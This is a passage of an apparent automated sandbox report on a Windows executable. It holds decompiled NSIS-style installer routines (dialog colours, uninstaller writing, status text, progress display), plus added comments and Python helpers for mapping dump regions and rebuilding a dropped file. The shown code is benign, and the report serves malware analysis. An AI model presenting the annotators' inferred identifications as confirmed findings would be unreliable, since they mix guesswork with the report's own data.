                                                                                    • API String ID: 589700163-620660263
                                                                                    • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                    • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
                                                                                    • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                    • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                    				struct tagLOGBRUSH _v16;
                                                                                    				long _t35;
                                                                                    				long _t37;
                                                                                    				void* _t40;
                                                                                    				long* _t49;
                                                                                    
                                                                                    				if(_a4 + 0xfffffecd > 5) {
                                                                                    					L15:
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                    				if(_t49 == 0) {
                                                                                    					goto L15;
                                                                                    				}
                                                                                    				_t35 =  *_t49;
                                                                                    				if((_t49[5] & 0x00000002) != 0) {
                                                                                    					_t35 = GetSysColor(_t35);
                                                                                    				}
                                                                                    				if((_t49[5] & 0x00000001) != 0) {
                                                                                    					SetTextColor(_a8, _t35);
                                                                                    				}
				/* Tail of a dialog-control colour handler: _a8 is the HDC, _t49 points at a per-control
				   colour record (record[1] = background colour, [2] = brush style, [3] = cached HBRUSH,
				   [4] = background mode, [5] = flags) and _v16 is the LOGBRUSH handed to CreateBrushIndirect. */
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {      /* flag 0x08: record[1] is a COLOR_* index, not an RGB value */
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {      /* flag 0x04: also apply it as the DC background colour */
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {      /* flag 0x10: (re)create the background brush */
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);            /* release the previous brush before replacing it */
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];                        /* the cached brush handle is the handler's result */
			}

			Instruction addresses for the listing above, one per decompiled line of the whole function (0x00000000 marks a line with no code of its own): 0x00403efc 0x00403f90 0x00000000 0x00403f90 0x00403f0d 0x00403f11 0x00000000 0x00000000 0x00403f17 0x00403f20 0x00403f23 0x00403f23 0x00403f29 0x00403f2f 0x00403f2f 0x00403f3b 0x00403f41 0x00403f48 0x00403f4b 0x00403f4e 0x00403f50 0x00403f50 0x00403f58 0x00403f5e 0x00403f5e 0x00403f68 0x00403f6d 0x00403f70 0x00403f75 0x00403f78 0x00403f78 0x00403f88 0x00403f88 0x00000000

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2320649405-0
                                                                                    • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                    • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
                                                                                    • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                    • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
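The "Memory Dump Source" entries above are the only statement of this process's memory layout in the report, and every address in the listings (function entry points, `ref:` call sites, the globals at 0x42e404, 0x42ec34 and 0x42eca8, the string buffer at 0x429878) has to be read against them. The following is an added example, not code from the report or from the sample: it parses those dump names and resolves page addresses to the dumped region and its page protection. The field reading of the dotted name (process index, dump sequence, dump id, base address, page protection, region type) is my assumption from the names on this page, not a documented Joe Sandbox format; only the base-address and protection fields are used, and the protection values are decoded as the Windows PAGE_* constants (0x02, 0x04 and 0x20 are the ones that occur here). Region sizes are not in the names, so each region is assumed to run up to the next base.

```python
# Added example (not from the report or the sample): resolve addresses from the
# listings against the "Memory Dump Source" regions. Field layout of the dump
# name is an assumption; only base address (field 4) and protection (field 5)
# are used.
from dataclasses import dataclass
from typing import List, Optional

# Windows PAGE_* protection constants (winnt.h), reduced to a short label.
PAGE_PROTECTION = {
    0x01: "NOACCESS", 0x02: "R", 0x04: "RW", 0x08: "WC",
    0x10: "X", 0x20: "RX", 0x40: "RWX", 0x80: "WCX",
}

# Dump names exactly as listed under "Memory Dump Source" above.
DUMP_NAMES = [
    "00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp",
    "00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp",
    "00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp",
    "00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp",
    "00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp",
    "00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp",
    "00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp",
    "00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp",
]


@dataclass(frozen=True)
class Region:
    base: int      # load address of the dumped region
    protect: int   # PAGE_* value from the dump name
    name: str      # the .sdmp file it came from


def parse_dump_name(name: str) -> Region:
    """Split one dump file name into a Region (assumed field layout, see above)."""
    stem = name[:-len(".sdmp")] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 6:
        raise ValueError(f"unexpected dump name layout: {name}")
    return Region(base=int(fields[3], 16), protect=int(fields[4], 16), name=name)


def build_region_map(names: List[str]) -> List[Region]:
    """Regions sorted by base address; each is assumed to extend to the next base."""
    return sorted((parse_dump_name(n) for n in names), key=lambda r: r.base)


def locate(addr: int, regions: List[Region]) -> Optional[Region]:
    """Region with the highest base <= addr, or None when addr lies below all of them.
    The last region is open-ended because the names carry no size (assumption)."""
    hit = None
    for r in regions:
        if r.base <= addr:
            hit = r
        else:
            break
    return hit


def describe(addr: int, regions: List[Region]) -> str:
    """Human-readable placement of addr, e.g. '0x004026af: region 0x00401000 (RX)'."""
    r = locate(addr, regions)
    if r is None:
        return f"{addr:#010x}: outside dumped regions"
    prot = PAGE_PROTECTION.get(r.protect & 0xFF, f"{r.protect:#x}")
    return f"{addr:#010x}: region {r.base:#010x} ({prot})"


if __name__ == "__main__":
    regions = build_region_map(DUMP_NAMES)
    # Addresses taken from the listings on this page: three function entries,
    # the globals read by E004026AF / E00404EB3, and the status-text buffer.
    for a in (0x00403EFC, 0x004026AF, 0x00404EB3, 0x0042E404,
              0x0042EC34, 0x0042ECA8, 0x00429878):
        print(describe(a, regions))
```

Run as-is it places the three listed functions in the execute-read region at 0x401000, the status buffer 0x429878 in the read-write region at 0x420000 and the globals 0x42e404 / 0x42ec34 / 0x42eca8 in the read-write region at 0x42C000; the `ref:` addresses under each APIs heading resolve the same way.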

                                                                                    C-Code - Quality: 86%
			/* Writes a file built from a header buffer plus a list of in-place patches, then deletes
			   the file if the follow-up step reports an error. The -666 sentinel, the string-parameter
			   helpers and the error accounting at the end match the WriteUninstaller handler of the
			   NSIS installer stub; that identification comes from the code pattern, the report itself
			   does not name the packer. __ebx holds 0 on entry and is used below both as NULL and as
			   the comparison constant. _t24, _t49 and _t52 are used but not declared by the decompiler
			   (Quality 86%); _t24 is the same return value as _t52. Trailing comments carry the
			   instruction address of each line. */
			E004026AF(struct _OVERLAPPED* __ebx) {                                             /* 0x004026af */
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;                                                                  /* 0x004026b1: _t47 == 0 from here on */
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;                                      /* 0x004026b1: ret = -666 (sentinel, "not attempted") */
				_t52 = E00402A29(0xfffffff0);                                                   /* 0x004026bd: resolve string parameter -0x10: the target path */
				 *(_t58 - 0x38) = _t24;                                                        /* 0x004026c0: keep the path for DeleteFileA below */
				if(E00405727(_t52) == 0) {                                                     /* 0x004026ca: path check failed */
					E00402A29(0xffffffed);                                                     /* 0x004026ce: resolve string parameter -0x13 instead */
				}
				E0040587F(_t52);                                                               /* 0x004026d4 */
				_t27 = E0040589E(_t52, 0x40000000, 2);                                         /* 0x004026e1: open for writing: GENERIC_WRITE, CREATE_ALWAYS */
				 *(_t58 + 8) = _t27;                                                           /* 0x004026e9: file handle */
				if(_t27 != 0xffffffff) {                                                       /* 0x004026ec: INVALID_HANDLE_VALUE check */
					_t32 =  *0x42ec34;                                                         /* 0x004026f2: header size, from a global */
					 *(_t58 - 0x30) = _t32;                                                    /* 0x00402700 */
					_t51 = GlobalAlloc(0x40, _t32);                                            /* 0x00402705: GPTR buffer for the header */
					if(_t51 != _t47) {                                                         /* 0x00402709: allocation succeeded */
						E004030E2(_t47);                                                       /* 0x0040270c */
						E004030B0(_t51,  *(_t58 - 0x30));                                      /* 0x00402715: fill the header buffer (size bytes) */
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));                             /* 0x00402721: buffer for the patch list */
						 *(_t58 - 0x34) = _t56;                                                /* 0x00402725 */
						if(_t56 != _t47) {                                                     /* 0x00402728 */
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20)); /* 0x00402732: populate the patch list buffer */
							while( *_t56 != _t47) {                                            /* 0x00402751: record = {u32 len, u32 offset, data[len]}; len 0 ends the list */
								_t49 =  *_t56;                                                 /* 0x00402739: len */
								_t57 = _t56 + 8;                                               /* 0x0040273e: data starts after the two dwords */
								 *(_t58 - 0x48) =  *_t56;                                      /* 0x00402746 */
								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);       /* 0x00402749: copy len bytes to header + offset; offset is not checked against the header size */
								_t56 = _t57 +  *(_t58 - 0x48);                                 /* 0x0040274e: advance to the next record */
							}
							GlobalFree( *(_t58 - 0x34));                                       /* 0x00402758 */
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);     /* 0x0040276a: write the patched header; lpOverlapped = NULL */
						GlobalFree(_t51);                                                      /* 0x00402771 */
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47); /* 0x00402783: same routine, now targeting the file handle; its result becomes ret */
					}
					CloseHandle( *(_t58 + 8));                                                 /* 0x00402789 */
				}
				_t53 = 0xfffffff3;                                                             /* 0x00402794: status -13 */
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {                                       /* 0x00402795: ret < 0 */
					_t53 = 0xffffffef;                                                         /* 0x00402799: status -17 */
					DeleteFileA( *(_t58 - 0x38));                                              /* 0x0040279d: remove the partially written file */
					 *((intOrPtr*)(_t58 - 4)) = 1;                                             /* 0x004027a3: local error flag */
				}
				_push(_t53);                                                                   /* 0x004027aa: status code for E00401423 */
				E00401423();                                                                   /* 0x00402197 */
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));                           /* 0x004028c1: add the error flag to a global error counter */
				return 0;                                                                      /* 0x004028cd */
			}

                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                                                    • GlobalFree.KERNEL32 ref: 00402758
                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                                                    • GlobalFree.KERNEL32 ref: 00402771
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3294113728-0
                                                                                    • Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                                                    • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
                                                                                    • Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                                                    • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
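The loop in E004026AF above is the part worth replaying when the dropped file has to be rebuilt from a memory dump: a header buffer of the size held at 0x42ec34 is patched in place by a list of records, each `{u32 len, u32 offset, data[len]}`, terminated by a zero length, and the patched buffer is what WriteFile() receives. The following is an added example, not code from the report or from the sample: it implements that record format in Python so a patch list and header carved from the dumps can be combined offline. The record layout is read off the decompiled loop (length at +0, offset at +4, data at +8); the header and patch bytes in `demo()` are constructed here for illustration. Where the decompiled loop copies to header + offset without a check, this version rejects records that would land outside the header or that run past the end of the patch list.

```python
# Added example (not from the report or the sample): replay of the patch loop
# in E004026AF. Record format {u32 len, u32 offset, data[len]}, len == 0 ends
# the list; all integers little-endian. Sample inputs are constructed.
import struct
from typing import Iterator, List, Optional, Tuple


def iter_patch_records(blob: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (offset, data) per record, stopping at the zero-length terminator.
    Raises ValueError if a record is truncated or the terminator is missing
    (the decompiled loop would keep reading past the buffer in both cases)."""
    pos = 0
    while True:
        if pos + 8 > len(blob):
            raise ValueError(f"patch list ends at {pos:#x} without a zero-length terminator")
        length, offset = struct.unpack_from("<II", blob, pos)
        if length == 0:
            return
        data = blob[pos + 8 : pos + 8 + length]
        if len(data) != length:
            raise ValueError(f"truncated record at {pos:#x}: need {length} bytes, have {len(data)}")
        yield offset, data
        pos += 8 + length


def apply_patches(header: bytes, patch_list: bytes) -> bytes:
    """Return header with every record copied to header[offset:offset+len],
    which is what E004026AF hands to WriteFile(). Unlike the decompiled loop,
    a record that would write outside the header raises instead of corrupting
    adjacent memory."""
    out = bytearray(header)
    for offset, data in iter_patch_records(patch_list):
        end = offset + len(data)
        if end > len(out):
            raise ValueError(f"patch {offset:#x}+{len(data)} exceeds header size {len(out):#x}")
        out[offset:end] = data
    return bytes(out)


def safe_apply(header: bytes, patch_list: bytes) -> Optional[bytes]:
    """apply_patches() that returns None on any malformed input."""
    try:
        return apply_patches(header, patch_list)
    except ValueError:
        return None


def build_patch_list(records: List[Tuple[int, bytes]]) -> bytes:
    """Inverse of iter_patch_records(); used here only to construct sample input."""
    blob = b"".join(struct.pack("<II", len(d), off) + d for off, d in records)
    return blob + struct.pack("<II", 0, 0)


def demo() -> bytes:
    """Constructed sample: a 64-byte 'MZ' header with two patches applied."""
    header = b"MZ" + bytes(62)
    patches = build_patch_list([
        (0x3C, struct.pack("<I", 0x40)),   # made-up value at the e_lfanew slot
        (0x10, b"\xAA\xBB\xCC\xDD"),       # made-up value elsewhere in the header
    ])
    return apply_patches(header, patches)


if __name__ == "__main__":
    print(demo().hex())
```

On a real dump, `header` is the buffer E004030B0 fills (size from 0x42ec34) and `patch_list` the buffer E00402E8E populates; both are GlobalAlloc'd and freed again before the function returns, so they have to be taken from a dump made while the loop is running.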

                                                                                    C-Code - Quality: 100%
			/* Appends a line of status text to a fixed 0x800-byte buffer at 0x429878 and mirrors it into
			   the window whose handle is stored at 0x42e3e8 and into the list-view control whose handle
			   is stored at 0x42e404. The message constants are the LVM_* values: 0x1004 LVM_GETITEMCOUNT,
			   0x1006 LVM_SETITEMA, 0x1007 LVM_INSERTITEMA, 0x1013 LVM_ENSUREVISIBLE; _v52.._v32 form the
			   LVITEMA passed to them (mask at +0, iItem at +4, iSubItem at +8, pszText at +20).
			   Trailing comments carry the instruction address of each line. */
			E00404EB3(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e404;                                        /* 0x00404eb9: list-view HWND (global) */
				_v8 = _t26;                                               /* 0x00404ec5 */
				if(_t26 != 0) {                                           /* 0x00404ec8: nothing to do without the control */
					_t27 =  *0x42ecd4;                                    /* 0x00404ece: status flags (global) */
					_v12 = _t27;                                          /* 0x00404eda */
					_t39 = _t27 & 0x00000001;                             /* 0x00404edd: bit 0: replace the last line instead of adding one */
					if(_t39 == 0) {                                       /* 0x00404ee0 */
						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);      /* 0x00404ee6: start a fresh line in the buffer from _a4 */
					}
					_t26 = lstrlenA(0x429878);                            /* 0x00404eec */
					_a4 = _t26;                                           /* 0x00404ef4: current buffer length, reused as a CHAR* slot */
					if(_a8 == 0) {                                        /* 0x00404ef7: no text to append */
						L6:                                               /* 0x00404f14 */
						if((_v12 & 0x00000004) == 0) {                    /* 0x00404f18: bit 2 clear: also show it as the window title */
							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);  /* 0x00404f21 */
						}
						if((_v12 & 0x00000002) == 0) {                    /* 0x00404f2b: bit 1 clear: update the list view */
							_v32 = 0x429878;                              /* 0x00404f34: LVITEM.pszText */
							_v52 = 1;                                     /* 0x00404f40: LVITEM.mask = LVIF_TEXT */
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);       /* 0x00404f47: LVM_GETITEMCOUNT */
							_v44 = 0;                                     /* 0x00404f4b: LVITEM.iSubItem */
							_v48 = _t29 - _t39;                           /* 0x00404f4e: LVITEM.iItem = count, or count - 1 when replacing */
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); /* 0x00404f61: LVM_INSERTITEMA, or LVM_SETITEMA when replacing */
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);    /* 0x00404f6f: LVM_ENSUREVISIBLE */
						}
						if(_t39 != 0) {                                   /* 0x00404f73: replace mode: drop the appended text again */
							_t28 = _a4;                                   /* 0x00404f75 */
							 *((char*)(_t28 + 0x429878)) = 0;             /* 0x00404f78: truncate back to the pre-append length */
							return _t28;
						}
					} else {                                              /* 0x00404ef9 */
						_t26 =  &(_a4[lstrlenA(_a8)]);                    /* 0x00404f01: new length = len(buffer) + len(_a8) */
						if(_t26 < 0x800) {                                /* 0x00404f09: bounds check against the 0x800-byte buffer before concatenating */
							_t26 = lstrcatA(0x429878, _a8);               /* 0x00404f0f */
							goto L6;
						}
					}
				}
				return _t26;                                              /* 0x00404f82 */
			}

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00429878,00000000,0041AF03,74B5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                    • lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041AF03,74B5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                    • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041AF03,74B5EA30), ref: 00404F0F
                                                                                    • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 2531174081-0
                                                                                    • Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                                                    • Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
                                                                                    • Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                                                    • Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00404782(struct HWND__* _a4, intOrPtr _a8) {
                                                                                    				long _v8;
                                                                                    				signed char _v12;
                                                                                    				unsigned int _v16;
                                                                                    				void* _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				long _v56;
                                                                                    				void* _v60;
                                                                                    				long _t15;
                                                                                    				unsigned int _t19;
                                                                                    				signed int _t25;
                                                                                    				struct HWND__* _t28;
                                                                                    
                                                                                    				_t28 = _a4;
                                                                                    				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                    				if(_a8 == 0) {
                                                                                    					L4:
                                                                                    					_v56 = _t15;
                                                                                    					_v60 = 4;
                                                                                    					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                    					return _v24;
                                                                                    				}
                                                                                    				_t19 = GetMessagePos();
                                                                                    				_v16 = _t19 >> 0x10;
                                                                                    				_v20 = _t19;
                                                                                    				ScreenToClient(_t28,  &_v20);
                                                                                    				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                    				if((_v12 & 0x00000066) != 0) {
                                                                                    					_t15 = _v8;
                                                                                    					goto L4;
                                                                                    				}
                                                                                    				return _t25 | 0xffffffff;
                                                                                    			}

                                                                                    0x00404790
                                                                                    0x0040479d
                                                                                    0x004047a3
                                                                                    0x004047e1
                                                                                    0x004047e1
                                                                                    0x004047f0
                                                                                    0x004047f7
                                                                                    0x00000000
                                                                                    0x004047f9
                                                                                    0x004047a5
                                                                                    0x004047b4
                                                                                    0x004047bc
                                                                                    0x004047bf
                                                                                    0x004047d1
                                                                                    0x004047d7
                                                                                    0x004047de
                                                                                    0x00000000
                                                                                    0x004047de
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040479D
                                                                                    • GetMessagePos.USER32 ref: 004047A5
                                                                                    • ScreenToClient.USER32 ref: 004047BF
                                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047D1
                                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047F7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Message$Send$ClientScreen
                                                                                    • String ID: f
                                                                                    • API String ID: 41195575-1993550816
                                                                                    • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                    • Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
                                                                                    • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                    • Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
                                                                                    				char _v68;
                                                                                    				int _t11;
                                                                                    				int _t20;
                                                                                    
                                                                                    				if(_a8 == 0x110) {
                                                                                    					SetTimer(_a4, 1, 0xfa, 0);
                                                                                    					_a8 = 0x113;
                                                                                    				}
                                                                                    				if(_a8 == 0x113) {
                                                                                    					_t20 =  *0x414c40; // 0x8600
                                                                                    					_t11 =  *0x428c50;
                                                                                    					if(_t20 >= _t11) {
                                                                                    						_t20 = _t11;
                                                                                    					}
                                                                                    					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                    					SetWindowTextA(_a4,  &_v68);
                                                                                    					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                    				}
                                                                                    				return 0;
                                                                                    			}

                                                                                    0x00402b7b
                                                                                    0x00402b89
                                                                                    0x00402b8f
                                                                                    0x00402b8f
                                                                                    0x00402b9d
                                                                                    0x00402b9f
                                                                                    0x00402ba5
                                                                                    0x00402bac
                                                                                    0x00402bae
                                                                                    0x00402bae
                                                                                    0x00402bc4
                                                                                    0x00402bd4
                                                                                    0x00402be6
                                                                                    0x00402be6
                                                                                    0x00402bee

                                                                                    APIs
                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                                                    • MulDiv.KERNEL32(00008600,00000064,?), ref: 00402BB4
                                                                                    • wsprintfA.USER32 ref: 00402BC4
                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                                                    • SetDlgItemTextA.USER32 ref: 00402BE6
                                                                                    Strings
                                                                                    • verifying installer: %d%%, xrefs: 00402BBE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                    • String ID: verifying installer: %d%%
                                                                                    • API String ID: 1451636040-82062127
                                                                                    • Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                                                    • Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
                                                                                    • Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                                                    • Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 85%
                                                                                    			E00402336(void* __eax) {
